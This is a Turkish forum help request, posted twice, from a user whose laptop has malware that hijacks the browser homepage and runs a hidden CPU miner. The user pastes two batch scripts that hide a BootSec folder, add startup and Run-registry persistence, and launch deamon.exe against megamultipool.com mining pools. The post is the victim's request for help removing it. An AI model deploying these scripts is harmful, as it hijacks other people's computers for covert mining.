Nykspo
Kilopat
- Katılım
- 10 Mart 2014
- Mesajlar
- 79
Merhaba arkadaşlar;
Öncelikle belirtmek isteyim konuyu yanlış yere açmış olabilirim bu doğal bir şey.
Konuya geçersek dizüstü bilgisayarımda bir virüs var ve bu virüs google chrome,internet explorer gibi browserlerın başlangıç sayfalarını değiştiriyor ne kadar değiştirsem google yapsam geri haberpress diye bir sayfa çıkıyor ve bu değiştirilemiyor ve başlangıçta cpu %100 oluyor deamon.exe diye 3-4 tane program çalışıyor bunları sonlandırınca bilgisayar rahat nefes alıyor ve o virüsün kaynağına yani dosyasına girdiğimde 2 tane .bat dosyası gözüme çarptı
1.star.bat
SET INSTALLPATH=%HOMEDRIVE%\BootSec
mkdir %INSTALLPATH%
copy *.* "%INSTALLPATH%" /Y
copy *.* "%HOMEDRIVE%/BootSec" /Y
attrib +H /S /D c:\BootSec
copy winstart.lnk "%USERPROFILE%\Start Menu\Programs\StartUp\" /Y
copy winstart.lnk "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" /Y
copy winstart.lnk "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\" /Y
copy winstart.lnk C:\"Documents and Settings"\%USERNAME%\"Start Menu"\Programlar\BALANG~1\ /Y
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Mnd" /d "%HOMEDRIVE%\BootSec\nircmd.exe exec hide %HOMEDRIVE%\BootSec\deamon.exe -o stratum+tcp://east-us.megamultipool.com:80 -u Stradan.united -p 1" /f
reg del "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Mnd2" /d "%HOMEDRIVE%\BootSec\nircmd.exe exec hide %HOMEDRIVE%\BootSec\deamon.exe -o stratum+tcp://scrypt.megamultipool.com:80 -u Stradan.united -p 1" /f
nircmd.exe exec hide startcpu.bat
deamon.exe -R 1 -o stratum+tcp://east-us.megamultipool.com:80 -u Stradan.united -p 1
2.startcpu
deamon.exe -R 1 -o stratum+tcp://scrypt.megamultipool.com:80 -u Stradan.united -p 1
format ataağım ancak ekran kartını değiştireceğim için formatı pek kullanmıyorum zararlı oldğunu duymuştum.
*Ekteki klasör silinmiyor siliyorum pcyi kapatıp açtığımda yeniden geliyor.
*Msconfigden deamon.exe yi kapatıyorum ancak geri işaretliyor.
Öncelikle belirtmek isteyim konuyu yanlış yere açmış olabilirim bu doğal bir şey.
Konuya geçersek dizüstü bilgisayarımda bir virüs var ve bu virüs google chrome,internet explorer gibi browserlerın başlangıç sayfalarını değiştiriyor ne kadar değiştirsem google yapsam geri haberpress diye bir sayfa çıkıyor ve bu değiştirilemiyor ve başlangıçta cpu %100 oluyor deamon.exe diye 3-4 tane program çalışıyor bunları sonlandırınca bilgisayar rahat nefes alıyor ve o virüsün kaynağına yani dosyasına girdiğimde 2 tane .bat dosyası gözüme çarptı
1.star.bat
SET INSTALLPATH=%HOMEDRIVE%\BootSec
mkdir %INSTALLPATH%
copy *.* "%INSTALLPATH%" /Y
copy *.* "%HOMEDRIVE%/BootSec" /Y
attrib +H /S /D c:\BootSec
copy winstart.lnk "%USERPROFILE%\Start Menu\Programs\StartUp\" /Y
copy winstart.lnk "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" /Y
copy winstart.lnk "C:\Documents and Settings\%USERNAME%\Start Menu\Programs\Startup\" /Y
copy winstart.lnk C:\"Documents and Settings"\%USERNAME%\"Start Menu"\Programlar\BALANG~1\ /Y
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Mnd" /d "%HOMEDRIVE%\BootSec\nircmd.exe exec hide %HOMEDRIVE%\BootSec\deamon.exe -o stratum+tcp://east-us.megamultipool.com:80 -u Stradan.united -p 1" /f
reg del "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Mnd2" /d "%HOMEDRIVE%\BootSec\nircmd.exe exec hide %HOMEDRIVE%\BootSec\deamon.exe -o stratum+tcp://scrypt.megamultipool.com:80 -u Stradan.united -p 1" /f
nircmd.exe exec hide startcpu.bat
deamon.exe -R 1 -o stratum+tcp://east-us.megamultipool.com:80 -u Stradan.united -p 1
2.startcpu
deamon.exe -R 1 -o stratum+tcp://scrypt.megamultipool.com:80 -u Stradan.united -p 1
format ataağım ancak ekran kartını değiştireceğim için formatı pek kullanmıyorum zararlı oldğunu duymuştum.
*Ekteki klasör silinmiyor siliyorum pcyi kapatıp açtığımda yeniden geliyor.
*Msconfigden deamon.exe yi kapatıyorum ancak geri işaretliyor.
